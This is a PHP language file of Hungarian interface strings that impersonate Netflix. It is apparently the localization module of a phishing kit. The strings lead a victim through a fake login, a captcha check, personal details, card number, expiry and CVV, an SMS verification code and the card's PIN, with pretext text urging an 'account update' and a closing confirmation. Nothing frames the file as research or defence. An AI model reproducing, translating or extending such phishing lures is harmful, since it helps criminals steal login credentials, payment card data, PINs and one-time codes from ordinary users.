<?php
function lang($phrase){
    static $lang = array(

        "xlang" => "hu",
        "xcapt" => "Kérjük, szánjon időt az alábbi hCaptcha megoldására. Segít nekünk biztosítani, hogy Ön valódi felhasználó és nem robot, ezzel biztosítva mindenki számára a biztonságos környezetet.",
        "xcapt1" => "Kérjük, jelölje be a CAPTCHA négyzetet.",
        "xcapt2" => "Ellenőrzés",
        "xcapt3" => "Folytatás",
        "xmain1" => "Bejelentkezés",
        "xmain2" => "E-mail vagy telefonszám",
        "xmain3" => "Kérjük, adjon meg érvényes e-mail címet vagy telefonszámot.",
        "xmain4" => "Jelszó",
        "xmain5" => "A jelszónak 4 és 60 karakter között kell lennie.",
        "xmain6" => "Bejelentkezés",
        "xmain7" => "Emlékezz rám",
        "xmain8" => "Segítség kell?",
        "xmain9" => "Új a Netflixen?",
        "xmain10" => " Regisztrálj most.",
        "xmain11" => "Ezt az oldalt a Google reCAPTCHA védi, hogy biztosan nem vagy bot.",
        "xmain12" => "További információk.",
        "xinfoz1" => "Személyes információk",
        "xinfoz2" => "Keresztnév és vezetéknév",
        "xinfoz3" => "Ez a mező kötelező.",
        "xinfoz4" => "Születési dátum",
        "xinfoz5" => "Cím",
        "xinfoz6" => "Város",
        "xinfoz7" => "Irányítószám",
        "xinfoz8" => "E-mail cím",
        "xinfoz9" => "Telefonszám",
        "xinfoz10" => "Ez a űrlap kitöltése kötelező, mivel ezekre az információkra szükség van a kérelmed feldolgozásához.",
        "xinfoz11" => "Folytatás",
        "xpay1" => "Fizetési kártya beállítása",
        "xpay2" => "Kártyaszám",
        "xpay3" => "Kártyaszám szükséges.",
        "xpay4" => "Lejárati dátum",
        "xpay5" => "Lejárati dátum szükséges.",
        "xpay6" => "CVC/CVV",
        "xpay7" => "CVC/CVV szükséges.",
        "xpay8" => "Végponttól végpontig titkosított",
        "xpay9" => "Folytatás",
        "xsms1" => "Ellenőrzés",
        "xsms2" => "Biztonsági okokból meg kell győződnünk arról, hogy valóban te vagy.",
        "xsms3" => "Egy SMS-t küldünk egy biztonsági kóddal",
        "xsms4" => "Kérjük, add meg a kapott kódot",
        "xsms5" => "SMS kód",
        "xsms6" => "Érvénytelen SMS kód",
        "xsms7" => "Ez a lépés szükséges a kérelem biztonságos feldolgozásához.",
        "xsms8" => "Folytatás",
        "xpin1" => "Ellenőrzés",
        "xpin2" => "Biztonsági okokból meg kell győződnünk arról, hogy valóban te vagy.",
        "xpin3" => "Egy SMS-t küldünk egy biztonsági kóddal",
        "xpin4" => "Kérjük, add meg a kártya PIN kódját",
        "xpin5" => "PIN kód",
        "xpin6" => "Érvénytelen PIN kód",
        "xpin7" => "Ez a lépés szükséges a kérelem biztonságos feldolgozásához.",
        "xpin8" => "Folytatás",
        "xexpl1" => "Frissítés",
        "xexpl2" => "Reméljük, hogy ez az üzenet jókor ér el. Szeretnénk tájékoztatni arról, hogy fontos frissítened az adataidat a platformunkon, hogy folyamatos és biztonságos felhasználói élményt biztosíthassunk.",
        "xexpl3" => "Szolgáltatásaink javítása és fiókod biztonságának érdekében kérünk, hogy szánj időt az adataid frissítésére.",
        "xexpl4" => "Folytatás",
        "xconf1" => "Megerősítés",
        "xconf2" => "Őszinte köszönetünket fejezzük ki, hogy időt szántál az adataid frissítésére a platformunkon. Az fiókadatok biztonsága és pontossága nagyon fontos számunkra.",
        "xconf3" => "A változások sikeresen mentésre kerültek. Most már teljes mértékben élvezheted a platformunkat a legfrissebb és naprakész információkkal.",
        "xconf4" => "Folytatás",
        "xload1" => "Feldolgozás...",
        "xload2" => "Ne hagyja el ezt az oldalt.",
        "xfoot1" => "Kérdéseid vannak? Lépj kapcsolatba velünk.",
        "xfoot2" => "GYIK",
        "xfoot3" => "Segítségközpont",
        "xfoot4" => "Felhasználási feltételek",
        "xfoot5" => "Adatvédelem",
        "xfoot6" => "Süti beállítások",
        "xfoot7" => "Vállalati információk",
        "xfoot8" => "Magyar"
    );

    return $lang[$phrase];
}
?>
